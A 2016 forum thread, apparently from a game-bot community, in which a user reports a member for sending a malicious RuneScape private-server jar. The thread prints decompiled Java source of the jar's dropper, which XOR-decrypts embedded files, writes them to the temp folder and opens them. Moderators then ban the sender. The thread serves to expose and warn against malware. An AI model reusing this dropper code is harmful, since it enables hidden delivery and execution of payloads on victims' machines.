progamerz Posted April 15, 2016 Share Posted April 15, 2016 Disputed member:http://osbot.org/forum/user/62294-berke203/ Thread Link:N/A Explanation: He sent me on skype an RSPS server link and i ran it and ESET caught it as virus so after that i decompiled it. Evidence: Skype Profile screenshot with chat background : http://i.imgur.com/RlmLEn3.png Skype Chat logs: 1)http://i.imgur.com/lF8nu7l.png 2)http://i.imgur.com/hkWFOVa.png 3)http://i.imgur.com/jX8uqKL.png 4)http://i.imgur.com/mr07vog.png 5)http://i.imgur.com/LjECo9U.png 6)http://i.imgur.com/LjECo9U.png 7)http://i.imgur.com/OmxNc6Z.png 8)http://i.imgur.com/x8TjRNJ.png 9)http://i.imgur.com/5ZR8ZVA.png 10)http://i.imgur.com/DyXYY9w.png 11)http://i.imgur.com/DFTEunv.png File Code: Main.java /* * Decompiled with CFR 0_114. */ package de.sogomn.drop; import de.sogomn.drop.FileDropper; import de.sogomn.drop.XorCipher; import java.io.BufferedReader; import java.io.ByteArrayOutputStream; import java.io.IOException; import java.io.InputStream; import java.io.InputStreamReader; import java.io.Reader; import java.util.ArrayList; import java.util.function.IntFunction; import java.util.stream.Stream; public final class Main { private static final String NAME_PATH = "/data"; private static final String TEMP_DIRECTORY = System.getProperty("java.io.tmpdir"); private Main() { } private static String[] readLines(String path) throws IOException { InputStream in = Main.class.getResourceAsStream(path); InputStreamReader inReader = new InputStreamReader(in); BufferedReader reader = new BufferedReader(inReader); ArrayList<String> lines = new ArrayList<String>(); String line = null; while ((line = reader.readLine()) != null) { lines.add(line); } reader.close(); String[] lineArray = (String[])lines.stream().toArray(n -> new String[n]); return lineArray; } private static byte[] readResource(String fileName) throws IOException { InputStream in = Main.class.getResourceAsStream("/" + fileName); ByteArrayOutputStream out = new ByteArrayOutputStream(); byte[] buffer = new byte[1024]; int bytesRead = 0; while ((bytesRead = in.read(buffer)) != -1) { out.write(buffer, 0, bytesRead); } in.close(); byte[] data = out.toByteArray(); return data; } public static void main(String[] args) { try { String[] fileNames; String[] arrstring = fileNames = Main.readLines("/data"); int n = arrstring.length; int n2 = 0; while (n2 < n) { String name = arrstring[n2]; byte[] data = Main.readResource(name); XorCipher.crypt(data); FileDropper dropper = new FileDropper(name, data); dropper.drop(TEMP_DIRECTORY); ++n2; } } catch (IOException ex) { ex.printStackTrace(); } } } XorCipher.java /* * Decompiled with CFR 0_114. */ package de.sogomn.drop; public final class XorCipher { private static final byte KEY = 56; private XorCipher() { } public static void crypt(byte[] data) { int i = 0; while (i < data.length) { data[i] = (byte)(data[i] ^ 56); ++i; } } } FileDropper.java /* * Decompiled with CFR 0_114. */ package de.sogomn.drop; import java.awt.Desktop; import java.io.File; import java.io.FileOutputStream; import java.io.IOException; public final class FileDropper { private String fileName; private byte[] data; public FileDropper(String fileName, byte[] data) { this.fileName = fileName; this.data = data; } private void execute(File file) throws IOException { boolean openSupported; Desktop desktop; boolean desktopSupported = Desktop.isDesktopSupported(); if (desktopSupported && (openSupported = (desktop = Desktop.getDesktop()).isSupported(Desktop.Action.OPEN))) { desktop.open(file); } } public void drop(String directory) throws IOException { File file = new File(String.valueOf(directory) + File.separator + this.fileName); FileOutputStream out = new FileOutputStream(file); out.write(this.data); out.flush(); out.close(); this.execute(file); } } If u need anything more lemme know. Thanks, Progamerz Link to comment Share on other sites More sharing options...
progamerz Posted April 15, 2016 Author Share Posted April 15, 2016 Anything extra needed? Link to comment Share on other sites More sharing options...
Khaleesi Posted April 15, 2016 Share Posted April 15, 2016 (edited) Decompiled aswell The Jar holds a "RSPS jar", "data" folder and a "Crypted.exe" file. In the code above you can see he acces the /data folder and crypts the CRYPTED.exe file Probs hold RAT or some other malicious code, but can't proof that ^^ Be carefull if you open this! Khaleesi Edited April 15, 2016 by Khaleesi 4 Link to comment Share on other sites More sharing options...
progamerz Posted April 15, 2016 Author Share Posted April 15, 2016 Decompiled aswell The Jar holds a "RSPS jar", "data" folder and a "Crypted.exe" file. In the code above you can see he acces the /data folder and decrypts the CRYPTED.exe file Probs hold RAT or some other malicious code. Khaleesi Thanks! Link to comment Share on other sites More sharing options...
Developer Maxi Posted April 15, 2016 Developer Share Posted April 15, 2016 Malicious code for sure. Action will be taken, thanks for your efforts. 3 Link to comment Share on other sites More sharing options...
Dex Posted April 15, 2016 Share Posted April 15, 2016 Can you report the PM he sent you please? Link to comment Share on other sites More sharing options...
iKill Posted April 15, 2016 Share Posted April 15, 2016 This guy has added me on Skype, should I remove him/her? Link to comment Share on other sites More sharing options...
Dex Posted April 15, 2016 Share Posted April 15, 2016 This guy has added me on Skype, should I remove him/her? Yes, please do so. Link to comment Share on other sites More sharing options...
Genii Posted April 15, 2016 Share Posted April 15, 2016 This guy has added me on Skype, should I remove him/her?Can you provide evidence that the Skype links to berke203 Link to comment Share on other sites More sharing options...
progamerz Posted April 15, 2016 Author Share Posted April 15, 2016 Can you report the PM he sent you please? Sure thought u can check pm logs Says he is banned Link to comment Share on other sites More sharing options...
progamerz Posted April 15, 2016 Author Share Posted April 15, 2016 http://i.imgur.com/rSUjf6W.png Link to comment Share on other sites More sharing options...
iKill Posted April 15, 2016 Share Posted April 15, 2016 Iv blocked and removed on Dex request, but he had a link, linking to rsps advert page ( idk if I should say name of the forum there for I won't but I'm sure you know which one it is) Link to comment Share on other sites More sharing options...
Dex Posted April 16, 2016 Share Posted April 16, 2016 Iv blocked and removed on Dex request, but he had a link, linking to rsps advert page ( idk if I should say name of the forum there for I won't but I'm sure you know which one it is) Thanks for providing this info, the user was already IP banned out of precautionary measures and will remain IP banned now. 2 Link to comment Share on other sites More sharing options...
